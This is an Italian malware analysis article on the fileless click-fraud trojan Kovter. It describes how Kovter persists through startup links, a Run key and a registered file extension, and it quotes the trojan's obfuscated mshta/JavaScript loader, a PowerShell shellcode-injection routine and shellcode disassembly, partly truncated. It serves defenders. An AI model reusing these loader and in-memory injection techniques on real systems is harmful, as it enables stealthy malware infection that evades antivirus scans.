Qualche settimana fa abbiamo riscontrato un'infezione da malware chiamato Kovter.

Kovter è un malware classificato come "Fileless", il malware non è memorizzato su file ma sul registro di Windows.
Questa particolare tecnica è gia stata implementata a partire dal 2014 dal Trojan.Poweliks.

Kovter ha iniziato a diffondersi a partire dal 2013 e si evoluto successivamnete fino ad arrivare alla sua ultima versione di oggi.

Come si esegue Kovter

Kovter usa 2 metodi per eseguirsi automaticamente:

• mette in esecuzione sul menu di avvio un link con come casuale: %user%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\<random>.lnk
• modifica la chiave di registro:  HKCU\..\Run per eseguire un link con nome casuale

Link sul menu di avvio di esecuzione automatica

Il link sul menu di avvio di escuzione automatica esegue il seguente file:

C:\WINDOWS\system32\mshta.exe "javascript:x6uokfa="1H4Iy4";i4f=new ActiveXObject("WScript.Shell");k1GFd="Lo"; eB38vo=i4f.RegRead("HKCU\\software\\hpkxvramhp\\hjmyqgix"); Cax4C="j";eval(eB38vo);wUtAao9="taH";"

Il file mshta.exe è un programma legittimo di Windows che viene eseguito passandogli come parametro un codice JavaScript:

x6uokfa="1H4Iy4"; i4f=new ActiveXObject("WScript.Shell"); k1GFd="Lo"; eB38vo=i4f.RegRead("HKCU\\software\\hpkxvramhp\\hjmyqgix"); Cax4C="j"; eval(eB38vo); wUtAao9="taH";

Lo script legge il contenuto della chiave " HKCU\software\hpkxvramhp\hjmyqgix" e la esegue attraverso il comando "eval".


Modifica della chiave HKCU\..\Run

Kovter aggiunge il seguente valore nella chiave di registro HKCU\..\Run:

[*random] = %user%\AppData\Local\<random>\<random>.lnk

esempio: C:\Users\<user>\AppData\Local\437680\20c820.lnk

La voce  [*random] contiene un carattere che non permette di essere letto dall'utility Regedit, il quale visualizzerà il seguente messaggio di errore:



Il link con nome casuale esegue un file batch, anch'esso con nome casuale, memorizzato nella stessa cartella, esempio:

%user%\AppData\Local\437680\1f41aa.bat

Il file batch (1f41aa.bat) con nome casuale esegue il seguente comando:

start "" "%user%\AppData\Local\437680\d3d9d7.da511ec"

Il comando "start" esegue il file passatogli come parametro, che nel nostro caso è d3d9d7.da511ec
Come si può notare questo file non ha un estensione nota come .exe, ma Windows considerà tale estensione come "eseguibile".


Qui' Kovter usa un trucco registrando l'estensione ".da511ec" in modo che Windows la riconosca.
Infatti aggiunge nel registro le chiavi:

[HKEY_CLASSES_ROOT\.da511ec]
@="eb4832"

[HKEY_CLASSES_ROOT\eb4832\shell\open\command]
@="\"C:\\WINDOWS\\system32\\mshta.exe\" \"javascript:Hu3V6qmG=\"XN\"; p2g=new ActiveXObject(\"WScript.Shell\");U1H9OrwF=\"QUR\"; joZ5f=p2g.RegRead(\"HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix\"); OIGcCA1h=\"Dxz\";eval(joZ5f);D8yZHlzj=\"p\";\""

L'aggiunta di queste chiavi permette di aprire i file con estensione ".da511ec" attraverso il programma mshta.exe passandogli come parametro il codice malevole JavaScript.

Quindi l'esecuzione del comando:
start "" "%user%\AppData\Local\437680\d3d9d7.da511ec"

esegue in realtà:
"C:\\WINDOWS\\system32\\mshta.exe\" \"javascript:Hu3V6qmG=\"XN\"; p2g=new ActiveXObject(\"WScript.Shell\");U1H9OrwF=\"QUR\"; joZ5f=p2g.RegRead(\"HKCU\\\\software\\\\hpkxvramhp\\\\hjmyqgix\"); OIGcCA1h=\"Dxz\";eval(joZ5f);D8yZHlzj=\"p\";\""


Kovter usa 2 metodi per eseguire il suo codice Javascript.

Analisi dello script memorizzato in "HKCU\software\hpkxvramhp\hjmyqgix"

Qui' possiamo vedere la chiave di registro di Kovter con nome casuale HKCU\software\hpkxvramhp:


Lo script memorizzato nella chiave " HKCU\software\hpkxvramhp\hjmyqgix" è offuscato:

ZkiWOtZypMULIBG9qrrD="2nzAtBJtgQYLrRLzrg2TdDm0fTwtN7Ic"; O7PlR5uFSdkPYNrjZhe="DkVifljAd1IPcr5vGPfUtx"; Fohg1ujfWzRyMiXFRcneWxW4="MKXKSj6SJMRSTdQTadNQEmS8ph2NRmgTFJb"; mQfOBK6yjvxYdLNRIGFfGvPw="HZb12ww55xVi1rBXcDPK95PrI9qzNAD6rSFcqagM"; vrRHp0KKrR7ZveKiknDcYK="KGmNljtpOoPLKCThFcqwNQ5yXDsDE2g5hqFL7AkUlg"; lBMX2IP5hjeQCLgHmzbTKmdBo="r26TebqQPsyzVtodCaqe2oPCzirFM2W9sosS"; HjU2="180A4E020B1B373F222D2411191D1926331A380A [..] 9360F1E6850"; ATLaipjOWiJDbQAznVbD9jL="iFl6LyFIHQLkuiwxaH"; DvkCSeJGKXTu5nzfFmzvygFH="Byo15vi5zPcqS2qFTJOctr9wokbdJqpI"; PtExHAoHmpKvm6LfGgh="hWIWb1gtI4ERmSg9jd09"; lmkxbKzuBahY68nRzBrKRmUS="ryLa69HSi7AQfpKXvmgR2Vkeb1BjFDJUPx"; wdQ3co=""; for(kmzTk7ch=0;kmzTk7ch<HjU2.length;kmzTk7ch+=2)     wdQ3co+=String.fromCharCode(parseInt(HjU2.substr(kmzTk7ch,2),16));     ydvrOaLz2HZcnCYYkaj="wTIXNVLV60c5UDugog5qb"; PaPL8mXPEMyhvkf7VeyMdTR="JV4zU6NghDkk91qEK9u9htejMug2O7su"; RAGiRQTTVmMZ83FhbgjyIxAE="Wmo9xzd5h4K2aNyyLQhPdVYJKDTbBem3tt5ysnCzx"; wBYGstBJNlcvNcWCa9="15MCvunOq3VJS4gx825XBJifrvISFcZtvfmamrUWCDtlRd"; OmtaJnSPjpe4pXLYbBF2="oYeGuiuo1wQsYxaZoOpe1NM8y9xwNgXZajkK78H"; JYVks3AYUzeCFJIWfkUPE="4hg7sxnxB6NsncATOG"; YSzOYZNYXNkqN2WJvTHv="YkDbFfePrjt6HId2b4AswRtW"; ljxEXRUIo0Qjpmwr1nMN="ctK3nnLWU4djCYIymXrHLYSFIrUxU3eH"; evgsfov21ZJ="lhvSYvRVpGGvHIxSdRanhtd6gXeHJN4IdBXsrtPBEO17ZGOuDVEj6AkR75izW"; gKTiCbtkFl5a=""; for(NLhDZDUIcZn5XE=kkAphRRJTody9D0lR=0;kkAphRRJTody9D0lR<wdQ3co.length;kkAphRRJTody9D0lR++) {     gKTiCbtkFl5a+=String.fromCharCode(wdQ3co.substr(kkAphRRJTody9D0lR,1). \     charCodeAt()^evgsfov21ZJ.substr(NLhDZDUIcZn5XE,1).charCodeAt());     NLhDZDUIcZn5XE=(NLhDZDUIcZn5XE<evgsfov21ZJ.length-1)?NLhDZDUIcZn5XE+1:0; } ZABLXRQGMq09SljWiVtr="9JKsvjk4P2Ll2Jwz83tmlOVk9mOKBug2bb9p9UDjD"; loSSXayazxvyKP9ewHZw1Lk="lPHxkgl55EwVP5Tpg9cAeFq2"; IAREsOdQtRxh2QjeyYVsws="YfO26CzYlcPCVUjrT48uK36KKOetSxTdY0PwkkLMfqK"; FcXnrjQSGhP1IIGEROKDPDh="f0zkcSKM4h0YaVGzvNJV"; qMyKeAMydCiC1VeFxewzqcwF="JoknyqQX1e8hQfFlDr"; Bu0tWsiVrAbCnBrrQgfco="H80AX2ztfx6kgQ1qbjKNc"; eval(gKTiCbtkFl5a); MqslAVCZqdnNTFKpuJd7y="3fAmC1pt9tag38olxxXk"; SmUxB5WxYzMXGe7xkTaa="xAQ0ZR16dmiaDcB0nIp1tDTnh0DaEuJs4vu7Pzx937Kb"; fPjxGMkXi2A1yeboAoFzYuFi="i3UxxPkQ1TAYNURKdCb8XflpjQ7sCSjzJJ"; CwjNpyGMjcktWTbjF5EVDD="WSaorKEaleV0u7wrLfc8DN"; zeQ5DhYtR0dvZFkzBuTE="5nrYPt5gTHfW2Qhtvi8mzRt"; YUyBjQEh1bynUrzllDaEg="t5ubP6o1E29LKwk4AE4SlJg";

Dopo aver de-offuscato lo script otteniamo nella variabile gKTiCbtkFl5a il seguente codice:

tb8QRmeiRjcgQTauWHYd="tFg0e3aPTMijrBS8VYUeg9OTT7w7v2qY8hW16zb2vrN6"; scFiLQBmpVrejk7LOJD="Kc8JS7vM7zJPVjhs6lazVbRXBfgiU7oEFu1Axr"; FwRki5kymuSHEg5pnbPViUBt="oumMQgDIjMtmH6lH1bkK4ZsGpO2ryzZ04IFQ79"; JwFVDCBaEReTikqFfEsYr93P="9H9y6PG2sZeu7OWisk36UtQ"; qpidwGNUkfftJr4pcxHdShzv="vCDAdk54adDpeNAfrJHwY8RE4ZpWrLwFbRufEd2JbI"; zAoJE3XKRMQbBvUuQv4="T46t3bKeodHAmla488ompKrwPwTn"; UScSggymSrjTDXFe2J0qR="WJqcZB6w4HCiAUegDXAJdNKVj3yZpQzRgt0o"; WeSxn5UshbIhExFjzg="zJ6l0g7MdLYp1aLvlRh0pujqcRqfsYTg93psVCzx18BHZye"; try {     moveTo(-100,-100);     resizeTo(0,0);     c9Z=new ActiveXObject("WScript.Shell");     (c9Z.Environment("Process"))("xcly")="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('c2xlZXAoNDApO3Rye [...] leGl0Ow==')))"     aA0g0r=c9Z.Run("C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe iex $env:xcly",0,1) } catch(e){}close();

Questo script esegue il programma "powershell.exe" con parametro la variabile "iex" che contiene il codice da eseguire.
"iex" è offuscato in Base64, dopo averlo de-offuscato otteniamo:

sleep(40); try {     function gdelegate    {         Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);                 $TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System. [..];         $TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public", [..] ");         $TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual", [..] ");         return $TypeBuilder.CreateType();     }         function gproc {         Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);                 $SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};         $UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");         return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@( [..] );     }             [Byte[]] $sc32 = 0x55,0x8B,0xEC,0x81,0xC4,0x00,0xFA,0xFF,0xFF, [...] , 0xE6,0xED,0xB3;     [Uint32[]] $op=0;         $r=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualProtect),(gdelegate @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($sc32,$sc32.Length,0x40,$op);         if($r -eq 0) {         $pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);                 if($pr -ne 0) {             $memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));                         for ($i=0;$i -le ($sc32.Length-1);$i++) {                 $memset.Invoke(($pr+$i), $sc32[$i], 1)             };             ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);         }     }     else {         ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[Byte[]],[Byte[]],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$sc32,$sc32,0,0);     }     sleep(1200); } catch{}exit;

Il codice di PowerShell di Kovter fa le seguenti operazioni:

• L'array $sc32 è impostato con delle istruzioni di codice macchina: 0x55,0x8B,0xEC,0x81 etc
• Chiama l'api VirtualProtect sull'array $sc32, se l'operazione ha successo allora crea un thread (CreateThread) dove l'entrypoint del thread è l'array $sc32.
• se l'operazione di VirtualProtect precendente fallisce, allora alloca un buffer di memoria con VirtualAlloc e copia l'array  $sc32 (con memset) sul buffer allocato, dopo di che crea un thread (CreateThread) dove l'entrypoint punta all'indirizzo di memoria del buffer allocato.

Vediamo ora che cosa fa il thread creato da Kovter:

seg000:00000000                 push    ebp seg000:00000001                 mov     ebp, esp seg000:00000003                 add     esp, 0FFFFFA00h seg000:00000009                 push    ebx seg000:0000000A                 push    esi seg000:0000000B                 push    edi seg000:0000000C                 push    ebx seg000:0000000D                 push    esi seg000:0000000E                 push    edi seg000:0000000F                 cld seg000:00000010                 xor     edx, edx seg000:00000012                 mov     edx, fs:[edx+30h] seg000:00000016                 mov     edx, [edx+0Ch] seg000:00000019                 mov     edx, [edx+14h] seg000:0000001C [..] seg000:0000004A                 mov     [ebp-2Ch], eax seg000:0000004D                 mov     eax, [ebp-2Ch] seg000:00000050                 cmp     word ptr [eax], 'ZM' seg000:00000055                 jnz     loc_400026A seg000:0000005B                 mov     eax, [ebp-4] seg000:0000005E                 xor     edx, edx seg000:00000060                 push    edx seg000:00000061                 push    eax seg000:00000062                 mov     eax, [ebp-2Ch] seg000:00000065                 mov     eax, [eax+3Ch] seg000:00000068                 cdq seg000:00000069                 add     eax, [esp] seg000:0000006C                 adc     edx, [esp+4] seg000:00000070                 add     esp, 8 seg000:00000073                 mov     [ebp-30h], eax seg000:00000076                 mov     eax, [ebp-30h] seg000:00000079                 cmp     dword ptr [eax], 'EP' seg000:0000007F                 jnz     loc_400026A seg000:00000085                 mov     eax, [ebp-30h] [..] seg000:000000D5                 add     ecx, [ebp-4] seg000:000000D8                 cmp     dword ptr [ecx], 'daoL' seg000:000000DE                 jnz     short loc_4000136 seg000:000000E0                 lea     eax, [ecx+4] seg000:000000E3                 cmp     dword ptr [eax], 'rbiL' seg000:000000E9                 jnz     short loc_4000136 seg000:000000EB                 lea     eax, [ecx+8] seg000:000000EE                 cmp     dword ptr [eax], 'Ayra' seg000:000000F4                 jnz     short loc_4000136 seg000:000000F6                 lea     eax, [ecx+0Ch] seg000:000000F9                 cmp     byte ptr [eax], 0 seg000:000000FC                 jnz     short loc_4000136 seg000:000000FE                 mov     eax, [ebp-34h] seg000:00000101                 mov     eax, [eax+24h] seg000:00000104                 add     eax, [ebp-4] seg000:00000107                 xor     edx, edx seg000:00000109                 push    edx seg000:0000010A                 push    eax seg000:0000010B                 mov     eax, esi seg000:0000010D                 add     eax, eax seg000:0000010F                 cdq seg000:00000110                 add     eax, [esp] seg000:00000113                 adc     edx, [esp+4] seg000:00000117                 add     esp, 8 seg000:0000011A                 mov     ax, [eax] seg000:0000011D                 mov     edx, [ebp-34h] seg000:00000120                 mov     edx, [edx+1Ch] seg000:00000123                 add     edx, [ebp-4] seg000:00000126                 movzx   eax, ax seg000:00000129                 shl     eax, 2 seg000:0000012C                 add     edx, eax seg000:0000012E                 mov     eax, [edx] seg000:00000130                 add     eax, [ebp-4] seg000:00000133 seg000:00000133 loc_4000133: seg000:00000133                 mov     [LoadLibraryA], eax   ;[ebp-44h] seg000:00000136 seg000:00000136 loc_4000136:                            ; CODE XREF: seg000:000000DEj seg000:00000136                                         ; seg000:000000E9j ... seg000:00000136                 cmp     dword ptr [ecx], 'PteG' seg000:0000013C                 jnz     short loc_4000194 seg000:0000013E                 lea     eax, [ecx+4] seg000:00000141                 cmp     dword ptr [eax], 'Acor' seg000:00000147                 jnz     short loc_4000194 seg000:00000149                 lea     eax, [ecx+8] seg000:0000014C                 cmp     dword ptr [eax], 'erdd' seg000:00000152                 jnz     short loc_4000194 seg000:00000154                 lea     eax, [ecx+0Eh] [..] seg000:0000018E                 add     eax, [ebp-4] seg000:00000191                 mov     [GetProcAddress], eax  ; [ebp-48h] seg000:00000194 seg000:00000194 loc_4000194:                            ; CODE XREF: seg000:0000013Cj seg000:00000194                                         ; seg000:00000147j ... seg000:00000194                 cmp     dword ptr [ecx], 'triV' seg000:0000019A                 jnz     short loc_40001F2 seg000:0000019C                 lea     eax, [ecx+4] seg000:0000019F                 cmp     dword ptr [eax], 'Alau' seg000:000001A5                 jnz     short loc_40001F2 seg000:000001A7                 lea     eax, [ecx+8] seg000:000001AA                 cmp     dword ptr [eax], 'coll' seg000:000001B0                 jnz     short loc_40001F2 [..] seg000:000001EA                 mov     eax, [edx] seg000:000001EC                 add     eax, [ebp-4] seg000:000001EF                 mov     [VirtualAlloc], eax  ; [ebp-58h] [..] seg000:0000026A                 mov     byte ptr [ebp-0D1h], 61h ; 'a' seg000:00000271                 mov     byte ptr [ebp-0D0h], 64h ; 'd' seg000:00000278                 mov     byte ptr [ebp-0CFh], 76h ; 'v' seg000:0000027F                 mov     byte ptr [ebp-0CEh], 61h ; 'a' seg000:00000286                 mov     byte ptr [ebp-0CDh], 70h ; 'p' seg000:0000028D                 mov     byte ptr [ebp-0CCh], 69h ; 'i' seg000:00000294                 mov     byte ptr [ebp-0CBh], 33h ; '3' seg000:0000029B                 mov     byte ptr [ebp-0CAh], 32h ; '2' seg000:000002A2                 mov     byte ptr [ebp-0C9h], 2Eh ; '.' seg000:000002A9                 mov     byte ptr [ebp-0C8h], 64h ; 'd' seg000:000002B0                 mov     byte ptr [ebp-0C7h], 6Ch ; 'l' seg000:000002B7                 mov     byte ptr [ebp-0C6h], 6Ch ; 'l' seg000:000002BE                 mov     byte ptr [ebp-0C5h], 0 seg000:000002C5                 lea     eax, [ebp-0D1h] seg000:000002CB                 push    eax seg000:000002CC                 call    dword ptr [LoadLibraryA] [..] seg000:00000364                 cmp     dword ptr [ecx], 'OgeR' seg000:0000036A                 jnz     short loc_40003C7 seg000:0000036C                 lea     eax, [ecx+4] seg000:0000036F                 cmp     dword ptr [eax], 'Knep' seg000:00000375                 jnz     short loc_40003C7 seg000:00000377                 lea     eax, [ecx+8] seg000:0000037A                 cmp     dword ptr [eax], 'xEye' seg000:00000380                 jnz     short loc_40003C7 [..] seg000:000003C4                 mov     [RegOpenKeyEx], eax   ; [ebp-50h] seg000:000003C7                 cmp     dword ptr [ecx], 'QgeR' seg000:000003CD                 jnz     short loc_400042D seg000:000003CF                 lea     eax, [ecx+4] seg000:000003D2                 cmp     dword ptr [eax], 'yreu' seg000:000003D8                 jnz     short loc_400042D seg000:000003DA                 lea     eax, [ecx+8] seg000:000003DD                 cmp     dword ptr [eax], 'ulaV' seg000:000003E3                 jnz     short loc_400042D seg000:000003E5                 lea     eax, [ecx+0Ch] seg000:000003E8                 cmp     dword ptr [eax], 'AxEe' [..] seg000:0000042A                 mov     [RegQueryValueEx], eax  ; [ebp-54h] [..] seg000:0000043A                 mov     eax, [ebp+8] seg000:0000043D                 add     eax, 0A48h            ; 'software\hpkxvramhp',0 seg000:00000442                 mov     [ebp-84h], eax seg000:00000448                 mov     eax, [ebp-84h] seg000:0000044E                 add     eax, 0E4h ; 'õ'        ; eax = 0xb2c seg000:00000453                 mov     [0xb2c], eax    ; [ebp-88h] seg000:00000459                 xor     ebx, ebx seg000:0000045B                 xor     eax, eax seg000:0000045D                 mov     [ebp-9Ch], eax ; = 0 seg000:00000463                 xor     eax, eax seg000:00000465                 mov     [ebp-0A0h], eax ; = 0 seg000:0000046B                 lea     eax, [ebp-90h] seg000:00000471                 push    eax seg000:00000472                 push    1 seg000:00000474                 push    0 seg000:00000476                 mov     eax, [ebp-84h] seg000:0000047C                 push    eax seg000:0000047D                 push    80000002h seg000:00000482                 call    dword ptr [RegOpenKeyEx] seg000:00000485                 test    eax, eax seg000:00000487                 jnz     loc_4000513 seg000:0000048D                 lea     eax, [ebp-0A0h] seg000:00000493                 push    eax seg000:00000494                 push    0 seg000:00000496                 lea     eax, [ebp-94h] seg000:0000049C                 push    eax seg000:0000049D                 push    0 seg000:0000049F                 mov     eax, [ebp-84h]  ;  'software\hpkxvramhp',0 seg000:000004A5                 add     eax, 41h ; 'A'  ; eax -> jpmyhhqq seg000:000004A8                 push    eax seg000:000004A9                 mov     eax, [ebp-90h] seg000:000004AF                 push    eax seg000:000004B0                 call    dword ptr [RegQueryValueEx] seg000:000004B3                 test    eax, eax seg000:000004B5                 jnz     short loc_4000513 seg000:000004B7                 cmp     dword ptr [ebp-0A0h], 64h ; 'd' seg000:000004BE                 jbe     short loc_4000513 seg000:000004C0                 push    40h ; '@' seg000:000004C2                 push    3000h seg000:000004C7                 mov     eax, [ebp-0A0h] seg000:000004CD                 push    eax seg000:000004CE                 push    0 seg000:000004D0                 call    dword ptr [VirtualAlloc]   seg000:000004D3                 mov     [ebp-9Ch], eax        seg000:000004D9                 cmp     dword ptr [ebp-9Ch], 0 seg000:000004E0                 jz      short loc_4000513 seg000:000004E2                 lea     eax, [ebp-0A0h] seg000:000004E8                 push    eax seg000:000004E9                 mov     eax, [ebp-9Ch] seg000:000004EF                 push    eax seg000:000004F0                 lea     eax, [ebp-94h] seg000:000004F6                 push    eax seg000:000004F7                 push    0 seg000:000004F9                 mov     eax, [ebp-84h] seg000:000004FF                 add     eax, 41h ; 'A'  ; eax -> jpmyhhqq seg000:00000502                 push    eax seg000:00000503                 mov     eax, [ebp-90h]  ; hkey seg000:00000509                 push    eax seg000:0000050A                 call    dword ptr [RegQueryValueEx]  [..] seg000:00000A20                 mov     eax, [ebp-30h] seg000:00000A23                 mov     eax, [eax+28h]   ; entry point del file seg000:00000A26                 add     eax, [ebp-8] seg000:00000A29                 mov     [ebp-0Ch], eax  : image + entrypoint seg000:00000A2C                 xor     eax, eax seg000:00000A2E                 push    eax seg000:00000A2F                 push    1 seg000:00000A31                 push    dword ptr [ebp-8]   seg000:00000A34                 call    dword ptr [ebp-0Ch] ; salta all'entry point seg000:00000A37 seg000:00000A37 loc_4000A37:                            ; CODE XREF: seg000:00000757j seg000:00000A37                                         ; seg000:00000775j ... seg000:00000A37                 push    0 seg000:00000A39                 call    dword ptr [ExitProcess] seg000:00000A3C                 pop     edi seg000:00000A3D                 pop     esi seg000:00000A3E                 pop     ebx seg000:00000A3F                 mov     esp, ebp seg000:00000A41                 pop     ebp seg000:00000A42                 retn    4 [..] seg000:00000A48 aSoftwareHpkxvr db 'software\hpkxvramhp',0 [..] seg000:00000A89 aJpmyhhqq       db 'jpmyhhqq',0 [..] seg000:00000B2C                 push    ebp seg000:00000B2D                 mov     ebp, esp seg000:00000B2F                 pusha seg000:00000B30 seg000:00000B30 loc_4000B30: seg000:00000B30                 mov     edi, [ebp+8] seg000:00000B33                 mov     esi, [ebp+0Ch] seg000:00000B36                 mov     ecx, [ebp+10h] seg000:00000B39                 rep movsb seg000:00000B3B                 popa seg000:00000B3C                 pop     ebp seg000:00000B3D                 retn    0Ch [..]

Il codice macchina del thread del Kovter esegue le seguente operazioni:

• Recupera gli indirizzi dell'Api: LoadLibrary, GetProcAddress, VirtualAlloc, RegOpenkeyEx, RegQueryValueEx
  
• Legge la chiave di registro: HKCU\software\hpkxvramhp [jpmyhhqq] in un buffer di memoria allocato con VirtualAlloc
• Il contenuto della chiave HKCU\software\hpkxvramhp [jpmyhhqq] è cifrato, dopo averlo decifrato verifica se il suo contenuto è un file eseguibile (MZ)
  
• Dopo una serie di operazioni per la ricostruzione del file eseguibile in memoria, viene eseguito il suo codice attraverso la chiamata del suo EntryPoint
  

Considerazioni finali

Kovter è un trojan fraud-click che utilizza vari livelli di offuscamento (JavaScript, PowerShell, codice macchina) e tecniche di "Fileless", in modo da non venire intercettato durante la scansione antivirus del disco. Il contenuto del codice virale di Kovter è contenuto sul registro di Windows all'interno della chiave HKCU\Software con nome casuale.

Questo malware lascia alcune tracce sul disco, sono i file .lnk che sono utilizzati per venire eseguiti automaticamente (attraverso il menu di avvio e la chiave di registro HKCU\..\Run). Inoltre la lettura della chiave di registro HKCU\..\Run con Regedit segnala un errore, che può indicare all'utente la presenza di questo malware.
 

Autore: Ing. Gianfranco Tonello

Torna ad inizio pagina